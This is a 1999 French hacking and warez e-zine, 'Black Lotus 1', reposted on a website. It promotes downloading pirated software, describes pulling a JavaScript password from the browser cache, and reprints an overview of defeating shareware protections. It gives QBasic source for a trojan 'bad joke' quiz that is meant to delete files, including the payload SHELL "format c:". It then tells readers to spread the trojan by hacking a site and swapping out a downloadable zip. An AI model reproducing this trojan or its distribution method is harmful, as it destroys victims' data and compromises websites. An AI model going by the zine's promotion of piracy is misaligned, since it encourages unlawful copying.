Copy Link
Add to Bookmark
Report

Black Lotus 1

eZine's profile picture
Published in 
Black Lotus
 · 4 years ago
Black Lotus 1
Pin it

  

ÚÄÄÄ¿ ³ ÚÄÄÄÄ¿ ÚÄÄÄ¿ Ú Ú
³ ³ ³ ³ ³ ³ ³ ³ ÚÙ
ÃÄÄÄÁ¿ ³ ÃÄÄÄÄ´ ³ ÃÂÙ
³ ³ ³ ³ ³ ³ ³ ³ÀÄ¿
ÀÄÄÄÄÙ ÀÄÄÄ À Ù ÀÄÄÄÙ À À
Ü Ü Ü
ÛÛ ÛÛ ßÛÜ
ÜÛÛ ÛÛ ÜÛ
ÛÛ ÛÛÛ ßÛß
Ü ß Ï ß ÏÏ Ü
ÜÛÛÜ ÏÏÏÏÏÏÏ ÛÛÛ
NUMBER ÛÛÛÛÛÜ ÏÏÏÏ ÜÛÛÛÛÛ ONE
ßÛÛÛÛÛÜ ÜÛÛÛÛÛÛ
ßÛÛÛÛÛÜ ÛÛÛÛÛÛÛÛ
ßÛÛÛÛÛÜ ÛÛÛÛÛß
ßÛÛÛÛÛÛ ÛÛß

³ ÚÄÄÄÄ¿ ÚÄÄÂÄÄ¿ Ú ¿ ÚÄÄÄÄ¿
³ ³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³ ÀÄÄÄÄ¿
³ ³ ³ ³ ³ ³ ³
ÀÄÄÄ ÀÄÄÄÄÙ Á ÀÄÄÄÄÙ ÀÄÄÄÄÙ
WaREz - pROgrAMmAtiOn - BiDOuiLlE

YOU MUST SEE THIS DOCUMENT WITH
THE DOS EDIT

ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº DISCLAIMER ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

Les textes pr‚sents dans ce mag appartienne … leurs auteurs, vous n'
avez pas le droit de repiquer ces textes pour un autre mag, site web, ou tout autre
support de diffusion. Les textes sont purement ‚ducatifs, et ne m'engage pas
sur la fa‡on dont vous les utiliserez. Je ne peux ˆtre tenu pour responsable
de l'utilisation de ces textes. Ce texte est les infos qui vont suivre sont
l‚gales, c'est leur mise en pratique qui ne l'est pas.

ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº READY??? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

Salut les lamers!!! Thanks pour avoir downloader ce zine. Tient, pour
ceux ki l'aurait eu komme ‡a (bah oui koi) Black Lotus est un mag orient‚
warez/crack/bidouille/programmation, mais en warez, c'est la gamme appz que je
touche, pas de gamez!!!
Pourkoi Black Lotus??? Euh... Ca fait bien ;))) les joueurs de Magic
connaissent surement cette carte, mais pour les autres, Magic The Gathering
est un zeu de carte dont la carte la + chŠre (2700 boules je crois) et bein
c le Black Lotus, ca coute 0 … poser et ca ajoute 2 manas incolores a la
reserve de mana (vous avez rien pig‚??? c normal :))) J'ai choisi ce nom
paske la carte valant chŠre, ca veut dire ke Black Lotus est un super mag...
L'ASCII, c moi ki l'ai fait, c du 100% original... C en fait un
plagiat sur le logo du magazine Lotus Noir (mag presse ki parle de Magic)
Pour finir, je crois que Black Lotus est le mag ki contient le mois
fautes d'ortographes!!! Et c pas un mal kan on voit certains e-mags... Ah oui,
si l'‚kipe de Black Lotus pouvait s'agrandir, ce serait pas un mal (je suis
tout seul) donc, le mail c'est toto.best@wanadoo.fr
Le redac' chef Bubba

ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº ZE SOMMAIRE ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

1>>> Warez? Koi k'c'est??? (la question du lamer) Bubba
2>>> K'est kun lamer??? Bubba
3>>> Trouver du warez on the net Bubba
4>>> Hacker un passwd JavaScript Bubba
5>>> ASCII Bubba
6>>> Le crack de long en large Bubba
7>>> Programmer un BadJoke en Basic Bubba
8>>> C d‚j… finit! Bubba

ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº WAREZ??? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

Pour les lamers, voici une bref explication du warez. Vous konnaissez le mot
software? (dans le k contraire, allez voir un dokteur ou allez faire un tout
… l'HP ;))) et bien warez est en fait l'abr‚viation de softwarez. Voil… pour
l'histoire, un warez est un logiciel (un software donc) pirat‚. Vous chargez
des warez sur Internet alors ke dans le kommerce, vous le payez 6000 boules!
c kan mˆme interesting no? Il existe plusieurs sortes de warez. Il y a les
appz, qui vient du mot applications (Visual Basic,3D studio Max,...) et les
gamez, ki sont en fait des jeux, sauf ki sont raccourcis (pas de son) afin
de diminuer leur taille. En bref, les gamez, c de la daube, puike vous pouvez
avoir le mˆme jeu chez vos fournisseurs de CDs grav‚s :)))

ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº LAMER??? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

Alors koi k'c'est kun lamer??? Et bein un lamer, c une personne ki pose ce
genre de kestions. :))))

ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº WHERE WAREZ??? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

POUR TROUVER DU WAREZ IL VOUS FAUT:
+De la patience (bokoup)
+De l'english (indisp)
+Un aprem ou une nuit devant soit
+Un modem 56k ou un accŠs Num‚ris
+Une r‚serve de bouffe IMPORTANTE
+3 ou 4 Playboy pour les temps de chargements
+1 pot de chambre si vos chiottes sont loin du PC
+Un cerveau
+Des yeux
+Des mains (pour taper sur le clavier bande d'obs‚d‚s)
+Une paire de coui... (Ah tient non c pas necessaire, koi ke pour se branler
devant le Playboy...)
+Et tout autre objet utile

La warez, c bo en th‚orie, mais faut enkore le trouver sur le Net. Les petits
malins se diront hop! Je tape warez sur mon Yahoo et j'obtiens des cent... 2
r‚ponses!!! Tout de suite: Yahoo c de la DAUBE SUPREME, c pourri, mˆme la
version originale www.yahoo.com. Trouver du warez, c 'achement simple, vous
allez sur Alta Vista www.altavista.com, vous entrez warez et go!!! Autant vous
pr‚venir, trouver des sites warez fran‡ais au contenu INTERRESSANT, bah c dur,
mˆme les sites underground en g‚n‚ral sont nazb‚, ce sont des sites qui
souvent regorgent de liens ki marchent pas, et des fois -mais c rare- ce sont
des sites au contenu TRES interressant (je ne vous conseillerai jamais assez
www.multimania.com/gripsou et www.multimania.com/shmeitcorp et bien sur, my
home … moi www.multimania.com/utils) en bref en France, c soit un site TRES
BON, soit un site TRES NAZ. Les habitu‚s vont sur le channel warez-france et
r‚clament une 0day, mais bon, ca c une autre teknik kon verra peut-ˆtre +tard.
Bon, revenons … nos warez :))) donc, la liste de links s'affiche, vous en avez
pour + de 30H … tout visiter. Alors l… vous cliquez sur le premier link ki se
pointe et vous tombez: ERROR 404, This site does not exist HTTP ERROR. Bon et
bah ‡a riske d'ˆtre gai... Et merde, j'ai d‚j… tout bouff‚ ma r‚serve en +...
Alors komme un grand, vous vous sortez 2, 3 pakets de trucs … bouffer et vous
retournez sur Alta Vista, 2Šme link... Ah, ‡a marche!!! Et merde, c un site ki
met 3 ans … charger!!! Putain, j'ai charg‚ 1 image et je me suis tap‚ le
Playboy de long en large!!! Bon, on va puiser dans sa r‚serve d'images …
caractŠre douteux...
Voil…, c'‚tait juste pour dire que la recherche de warez et beh c'est pas une
syn‚cure, mais la Crack Team d'Utils Crypte va essayer de faire un site super
complet o— on peut downloader du warez, j'ai d‚j… pas mal de progs sur ma
ouaibe page alors allez y faire un ch'tit tour...

ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº HACKING? JAVA? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

>>>THE INTRO<<<
Il existe des mots de passe Java Script facilement hackable. En fait, c
tellement fastoche ke je qualifierai cette teknique (ke j'ai trouv‚ tout seul)
de bidouille plutot ke de hack. En plus, je pense ke c l‚gal. Pour vous
entrainez, le mag est fourni avec le Java … cracker.

>>>ZE TOOL OF ZE HACK<<<
Pour pirater les input Java, tu dois avoir:
+Internet Explorer 5
+Le bloc-note
+Un oeil (2 c mieux)
+Min une main avec un doigt

>>>FUCK THE JAVA<<<
Allez sur la page … hacker on vous demande le password, la boite de dialogue
Java s'affiche. L…, vous ne pouvez pas faire "affichage/source" pour chercher
le mot de passe dans la source HTML. Mais ce n'est pas grave, puisque qu vous
avez charg‚ la page, vous devez forc‚ment la trouver dans un dossier
temporaire, ce n'est pas C:\windows\temp mais un dossier particulier … IE5, il
se trouve … C:\Windows\temporary internet files\content ie5. Dans ce dossier,
toutes les pages que vous avez vu sur Internet sont copi‚s. Recherchez dans
cette jungle de HTML, de GIF et de JPG ladite page. G‚n‚ralement, si c'est la
derniŠre page que vous avez consult‚, le fichier se trouve "tout en bas" du
dossier. Imaginons que la page s'appelle password.html, allez dans le bloc-
note, et ouvrez le fichier password.html. Recherche la chaine if (pw == "code").
Dans cet exemple, le mot de passe est code. Retournez sur Internet et tapez le
zenti mot de passe... Et voil… un accŠs … un site interdit en +...

>>>ZE CONCLUSION<<<
Microsoft Internet Explorer 5 a encore am‚lior‚ sa protx, mais c pas encore au
point (c mˆme trŠs loins de l'ˆtre)

ÉÍÍÍÍÍËÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº ASCII ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÊÍÍÍÍͼ

L'ASCII, c'est super chouette!!! C avec ‡a que j'ai fait le logo de BL.
Donc, pour faire ces diff‚rents effets, vous faites alt+un num‚ro.
Voici lesdit num‚ros

-POUR DESSINER:
176:° 177:± 178:² 219:Û 220:Ü 223:ß 2: 10:

-TRACER:
179:³ 180:´ 217:Ù 218:Ú 221:Ý 191:¿ 192:À 193:Á 194:Â
195:Ã 196:Ä 197:Å 28: 170:ª

-TRACER (BIS):
200:È 201:É 185:¹ 186:º 187:» 188:¼ 202:Ê 203:Ë 204:Ì
205:Í 206:Î

-OTHER:
184:¸ 189:½ 190:¾ 207:Ï 208:Ð 222:Þ 198:Æ 199:Ç 21:
29: 30: 31: 145:‘ 156:œ 157: 166:¦ 167:§
174:® 175:¯ 11: 14: 15: 17: 20: 127: 157:
168:¨ 169:© 171:« 172:¬ 173:­ 189:½ 190:¾ 230:æ
231:ç 232:è


ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº CRACKING ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

Cet artcle a ‚t‚ trouv‚ sur un nø de PrograZine, c'est un mag qui
parle de programmation, et n'est aucunement orient‚ H/C/P/V. Que vient foutre
cet article dans Black Lotus alors??? Et bien les lamers du crack vont
apprendre pleins de trucs!!! C de la th‚orie, mais il faut ‡a avant la
pratique ;))) Crackers initi‚s et sup‚rieur, passez votre chemin.
Un (vrai) pirate est quelqu'un qui voudrait faire circuler la vraie
information à tout le monde et d'une manière gratuite. En gros, le pirate
pense que tous les logiciels sont des sources d'informations. Il les
distribue donc à toutes ces connaissances gratuitement. Normalement, un bon
pirate ne devrait jamais, même s'il le peut, détruire ou modifier un bien qui
ne lui est pas propre. Par exemple les pirates de réseau ne devraient pas
foutre en l'air un site par simple plaisir. Par contre, il ne se génera pas
pour récupérer toutes les informations qu'il pourrait y trouver.
Voilà, ça a l'air simple, mais les auteurs de logiciels voyant qu'ils
ne vendaient aucun de leurs logiciels et que 90% d'entres eux étaient
simplement copiés sur disquette, les programmeurs ont inventés pleins de
méthodes de protection contre la copie (c'est asez normal). Mais les très bon
pirates sont aussi de très bons programmeurs et vice-versa. Les pirates
réussissent donc à percer le secret de protection des logiciels (on dit alors
que le pirate "cracke" le logiciel). Résultat: des protections de plus en plus
dures à percer.
Bon, je ne suis sûrement pas là pour vous apprendre à déplomber les
logiciels, ce serait illégal, et la vie de PrograZine serait en jeu. Cet
article a été fait à la demande d'un lecteur qui pensait que ce serait bien
de savoir comment les pirates s'y prennent, sans entrer dans les détails.

>>>LES METHODES DE CRACKING<<<

En ce moment, une catégorie de logiciels a pris une place très
importante en micro-informatique: les sharewares (que je regroupe avec les
freewares).
Le programmeur inconnu vient d'écrire un programme qu'il trouve bien
et voudrait le commercialiser. Il veut donc se faire connaitre et montrer de
quoi est capable son programme. Il va donc sortir son programme en version
limitée pour que l'utilisateur puisse se faire une idée des possibilités de
son logiciel.
En fait, dans la plupart des sharewares, les logiciels sont fournis
en version complète!! eh oui. Seulement cette version complète n'est pas
accessible directement. Et c'est ces versions complètes que le pirate essaie
de dénicher.
Il faut savoir qu'il n'y a pas 36 possibilités de proposer des
versions limitées:
- les limites dans le temps: le logiciel ne sera utilisable que
pendant 15 jours par exemple. Mais les programmes sont livrés en
version complète. Cette sécurité est la moins sûre. Il suffirait de
faire croire au logiciel qu'il est toujours la même date. Sur certains
logiciels, n'importe qui sachant se servir de l'horloge sous DOS ou sous
Win pourrait déplomber le logiciel ...
- les limites dans le nombre d'utilisation: Le programme ne sera
utilisable que 10 fois par exemple. D'un point de vue interne, le
programme va forcément noter une valeur à un endroit du disque
(souvent les fichiers systèmes de Win) et incrémenter cette valeur à
chaque utilisation. La méthode de déplombage n'est, encore une fois,
pas très dure. Il suffit de trouver un programme qui note toute l'
arborescence du disque dur avant et après chaque utilisation (en temps
normal, c'est utilisé pour la desinstallation des logiciels).
- les protections par code: Le programme sera en version d'essai et il
sera attribué un numéro différent à chaque shareware. Au moment du
paiement, l'utilisateur reçoit une clé permettant d'activer la version
complète du logiciel. L'idée est donc de faire comme si on avait payé.
La méthode d'obtention de la clé est très différente suivant les cas:
soit on vous demande d'allez chercher la clé parmis une base de données
Minitel, soit l'auteur vous envoie la clé. Mais dans les deux cas, le
programme va vous demander votre clé de paiement. Il ne le vous dit
pas forcément, mais il compare cette clé au numéro d'identification du
shareware, si les numéros sont les mêmes, c'est bon, la version
complète est activée. Evidemment, c'est un peu simplifié, en général,
un fichier du disque va avoir quelquepart parmis ces nombreux octets,
3 ou 4 octets qui représentent le numéro interne du shareware, avec pas
loin, la bonne clé. Evidemment, la plupart du temps, ces informations
sont codées.

Le pirate va donc essayer de décoder ces informations. La, chacun a sa
méthode, mais la plus générale, c'est de "débugger" le programme. Ca vous
parait peut-être bizarre, tous les sharewares ne sont pas vendus par mico$oft,
pourquoi bogueraient-ils ?
En fait, il ne bogue pas (enfin, plus ou moins). Mais un débugger est
un programme qui permet de savoir ce que fait exactement le programme à chaque
instant. Bien sûr, il faut s'y connaître un peu, car le débugger vous dit ce
que fait le programme, mais en assembleur !! donc, faut s'accrocher.
Le pirate va donc faire défiler des millions de lignes de codes pour
finalement s'arreter à deux ou trois instructions qui controlent la procédure
de codage. Une fois cette procédure trouvée, il va falloir modifier le fichier
éxecutable pour dire au programme (toujours en assembleur), de sauter la
vérification. C'est une manière radicale, mais pas très "propre".
La deuxième méthode est donc de ne pas toucher au programme éxecutable
et de noter comment est codée la clé. En trouvant l'algorithme de codage,
le pirate pourra trouver la clé gratuitement. Comme ça, le programme sera en
version complète, proprement. Mais c'est une méthode très difficile.
La seconde méthode consiste à désassembler le programme. C'est assez
similaire au debugage, mais ça marche pour tous les programmes, contrairement
au débugage qui est parfois stoppé par le programme. Une fois la partie d'
algorithme de codage trouvée, il faut la rechercher et le modifier dans le
fichier executable.
Pour les programmes limités dans le temps, il faut faire croire au
logiciel, que c'est toujours le même jour qu'on l'execute. La plupart du temps,
il suffit de noter la date lors de l'installation et de toujours la remettre
avant chaque utilisation (ou rendre ça automatique par un programme). Un
programme universel a été écrit pour ces genres de protections: DateCracker.
Je ne vous direz pas où le trouver, mais sachez que ça existe.
Pour cracker les sharewares limités dans le nombre d'utilisation, il
faut procéder un peu comme quand on met des vies infinies dans les jeux avec
Game Wizard par exemple. On scanne tout le disque, en notant la taille des
fichiers et le contenu des plus importants (WINDOWS\*.INI, fichiers cachés, ...)
On installe ensuite le logiciel, puis on refait un scanne après chaque
éxecution pour voir ce qui a changé. De la sorte, on pourra isoler une partie
d'un fichier (un nombre par exemple) qui s'incrémente à chaque utilisation. Il
suffira après de noter le nombre d'origine à chaque éxecution pour faire
croire que c'est toujours la première fois.
C'est une méthode assez lourde, c'est pourquoi il vaut mieux utiliser des
désinstalleurs qui font le boulot de scan du disque. Une autre méthode
consisterait à chercher dans le fichier éxecutable du logiciel, tous les noms
de fichiers. Peut-être pourrait-on trouver le nom du fichier de protection.
Helas (?), bien souvent les fichiers éxecutables sont compréssé, ce qui fait
qu'on ne peut pas voir les chaines de caractères en clair.
Mais, pour décomprésser ces programmes, et donc voir toutes les
informations en clair (ou presque), il existe de nombreux programme qui
reconaissent la plupart des algo de compression de fichier .EXE (PkLite,
etc ...): UNP par exemple.
Pour tous les autres logiciels, ça se corse. Chaque logiciel ayant sa
méthode de protection, il n'y a pas grand chose de général. Mais il y a quand
même des protections "classiques":
- les protections par disquettes "incopiables": le logiciel est
distribué sur disquette et ne veut s'installer qu'à partir des
disquettes sources. En fait, une simple copie (COPY du DOS par
exemple) ne suffit pas. Il faut copier PHYSIQUEMENT la disquette
source, pour que le logiciel ne voit aucune différence. Ce type de
protection n'est plus beaucoup utilisé.
- les protections par dongle: le logiciel a besoin d'un petit bidule
qui se branche sur le port parallèle du PC juste pour dire qu'on a
acheté ce logiciel. Ce petit bidule envoit en fait constamment le même
code au PC. Pour cracker cette protection, il faut cherche le bout de
programme qui accède au port parallèle et enlever le test.
- les protections par CD: très à la mode en ce moment, le logiciel ne
vaut démarrer que si il trouve le CD original. Même chose que pour les
disquettes, mêmes si on recopie tout le CD (faut déjà avoir pas mal de
place), il manque toujours quelque chose. Tous les CDs contiennent une
zone d'information propre qui renseigne sur le nom du CD, le
fournisseur, etc ... Cette zone n'est accessible que si le programeur
passe par les routines de gestion des CDs. Pour cracker ces logiciels,
il faut simuler la présence du vrai CD en récupérant cette fameuse
zone d'information sur le CD original. Un logiciel qui s'appelle CD
Cracker fait cela. Bien sûr, il reste toujours les methodes radicales
qui consistenet à tout désassembler et regarder gentillement et
lentement chaque bout de programme, mais c'est pratiquement impossible
dans 95% des cas. (essayez de désassembler Quake !!).

>>>LES OUTILS DU CRACKER<<<

- d'assez bonnes connaissances de l'assembleur et du hardware de sa
machine.
- un très bon logiciel de débugging: SoftIce sur PC.
- un très bon désassembeur: IDA sur PC.
- un décomprésseur de fichiers éxecutables (car certains éxecutables
sont compréssés et décompréssés seulement lors de l'éxecution): UNP
(ou autres)
- une connaissance de quelques sites-clés sur Internet: FTP-SEARCH par
exemple.
- beaucoup d'astuces, de chance et de patience ... :)

ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº UN BAD JOKE EN QBASIC ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

>>>ZE INTRO<<<
Bon, dans ces lignes, je vais vous refiller le code source avec doc et tout de
The Bad Quizz 1.0, c'est un prog que j'ai fait en QBasic, vous aurez donc
besoin de QuikBasic si vous voulez le compiler. Mais d'abord, koi k'c'est kun
Bad Joke??? Un bad joke est une race de virii. C en fait un quizz, si le PD
qui execute le programme r‚pond mal, le bad joke fait des conneries, si c bon,
on passe … la question suivante. Ce type de virus peut ˆtre affreusement
m‚chant, et en plus, les antivirus ne les d‚tectent pas. Seul d‚faut, il ne
se reproduit pas de lui-mˆme. Je crois qu'il existe des progs pour qu'ils se
reproduisent tout seul, mais dans ce cas, vous dites adieu … l'indetectabilit‚
de l'antivirii. Quand vous voyez "REM ici code qui fait des conneries", vous
devez mettre qq commandes QBasic qui effacent tel ou tel fichier par exemple.
Si … la derniŠre question, vous voulez faire un formattage du lecteur, vous
mettez: SHELL "format c:" et le tour est jou‚!!!

>>>ZE SOURCE WITH DOC<<<
Zou, c parti...

REM The Bad Quizz v1.0
REM Ce prog va bouffer ton PC!
CLS
PRINT " "
COLOR 2
PRINT "*************** *************"
PRINT "*The Bad Quizz* *Version 1.0*"
PRINT "*************** *************"
PRINT ""
COLOR 7
PRINT "The Bad Quizz est un questionnaire sympathique avec des questions"
PRINT "marrante. Amusez-vous bien... Et faites p‚ter le score!"
PRINT ""
SHELL "pause"

REM debut question1

PRINT ""
CLS
SOUND 200, 3
SOUND 250, 3
SOUND 300, 3
SOUND 500, 3
SOUND 100, 9
COLOR 2
PRINT " **************"
PRINT " *QUESTION nø1*"
PRINT " **************"
PRINT ""
DIM q1 AS INTEGER
COLOR 7
PRINT "Quel est l'homme politique le plus con de la terre?"
PRINT ""
PRINT "1- LePen"
PRINT "2- Chirac"
PRINT "3- Voisnet"
PRINT ""
INPUT "Votre choix >"; q1
IF q1 = 1 THEN
PRINT "Selon vous, l'homme politique le plus con de la terre est"; q1
PRINT "Vous avez totalement raison!"
PRINT ""
PRINT "OK, maintenant, la question 2"
PRINT ""
SHELL "pause"
ELSE

PRINT ""
PRINT "Rat‚!!! C'‚tait LePen!!!"
PRINT "Ton PC va manger!"
REM ici, code faisant une connerie
SHELL "pause"
END IF



REM question2

PRINT ""
CLS
SOUND 200, 3
SOUND 250, 3
SOUND 300, 3
SOUND 500, 3
SOUND 100, 9
COLOR 2
PRINT " **************"
PRINT " *QUESTION nø2*"
PRINT " **************"
PRINT ""
DIM q2 AS INTEGER
COLOR 7
PRINT "Selon vous, quelle est la pire des choses qui puisse vous arriver"
PRINT ""
PRINT "1- La mort de votre belle-mŠre"
PRINT "2- Le crash de votre voiture"
PRINT "3- Une augmentation des tarifs France Telecon"
PRINT ""
INPUT "Votre choix >"; q2
IF q2 = 3 THEN
PRINT "Je suis TOTALEMENT d'accord! Bravo!"
PRINT ""
PRINT "OK, maintenant, la question 3"
PRINT ""
SHELL "pause"
ELSE
PRINT ""
PRINT "Mais non, c'est l'augmentation des tarifs France Telecon!"
PRINT "C'‚tait vraiment pas dur..."
PRINT "Ton PC va souffrir"
PRINT ""

REM ici, code faisant des conneries

SHELL "pause"

END IF

REM d‚but question3

PRINT ""
CLS
SOUND 200, 3
SOUND 250, 3
SOUND 300, 3
SOUND 500, 3
SOUND 100, 9
COLOR 2
PRINT " **************"
PRINT " *QUESTION nø3*"
PRINT " **************"
PRINT ""
DIM q3 AS INTEGER
COLOR 7
PRINT "Si vous aviez un fusil charg‚, sur qui tireriez-vous en premier?"
PRINT ""
PRINT "1- Votre belle-mŠre (encore!!!)"
PRINT "2- Le PDG France Telecon"
PRINT "3- LePen"
PRINT ""
INPUT "Votre choix >"; q3
IF q3 = 2 THEN
PRINT "Je suis TOTALEMENT d'accord! Bravo!"
PRINT ""
PRINT ""
SHELL "pause"
ELSE
PRINT ""
PRINT "Dommage!"
PRINT ""
PRINT "Si vous avez r‚pondu LePen, c'est vrai... Mais celui l…, vous lui"
PRINT "rŠglerez son compte plus tard"
PRINT "Ton PC va souffrir"
PRINT ""

REM ici, code faisant des conneries

SHELL "pause"

END IF

COLOR 2
CLS
PRINT "Ce quizz est finit."
PRINT "J'espŠre pour vous que vos r‚ponses ‚taient bonnes..."
PRINT "Ce que j'ai pas dit, c'est que TheBadQuizz est un Bad Joke"
PRINT "Si votre PC ne red‚marre pas, c'est normal :-))))))"
PRINT ""
PRINT " TU VIENS DE SUBIR UN VIRUS"
PRINT " TU T'ES FAIT BAISE PAR UN"
PRINT " PROG ECRIT PAR BUBBA!"
PRINT ""
COLOR 4
PRINT "Tu as peut-ˆtre subit l'effacement de tes fichiers systŠmes,"
PRINT "alors, v‚rifie bien avant d'‚teindre ton PC que rien ne manque,"
PRINT "car sinon, le crash total sera irr‚m‚diable!"
PRINT ""
PRINT "Je t'ai eu sale con, tu t'es fait bais‚ en beaut‚!"
SHELL "pause"
END

>>>DISTRIBUTE THIS VIRII<<<
Maintenant que le prog est fait, va falloir le diffuser sur les PCs des autres
Pour cela, la meilleur technique pour moi:
Rep‚rer dans un site que vous n'aimez pas un zip … charger.
Zippez le programme TheBadQuizz et renommer le zip pareil … celui du site.
Hackez le site web en rempla‡ant le zip sur le site par TheBadQuizz.
Et voil…!

ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº THE FINISH ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ

Pour finir, voici kk chiffres:
Taux de piratage:
( Utilisation de copies ill‚gales )
France 62%
Chine 98%
Russie 95%
Tha‹lande 92%
USA 25%
Pologne 81%
Espagne 76%
Canada 25%
Sur mon PC 99,99999999%
Source: je sais pas d'o— k'sa vient

Evidemment, les chiffres sont grossis; genre 98% en Chine, euh... Ca fait
bokoup koi... Sur mon PC, si c 99,99999999%, et pas 100%, c paske Win95
‚tait fourni avec le PC. Bien sur, je tourne maintenant avec une kopie de 98..
Mˆme mon assembleur me refourgue du warez (si si!!!) j'ai eu Works 4 et Office
gratos!!!
Donc vala koi... Si kkun veut se joindre … Black Lotus, c OK!!!

Copyright Bubba 1999 (c) (r) & TM
toto.best@wanadoo.fr
www.multimania.com/utils

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT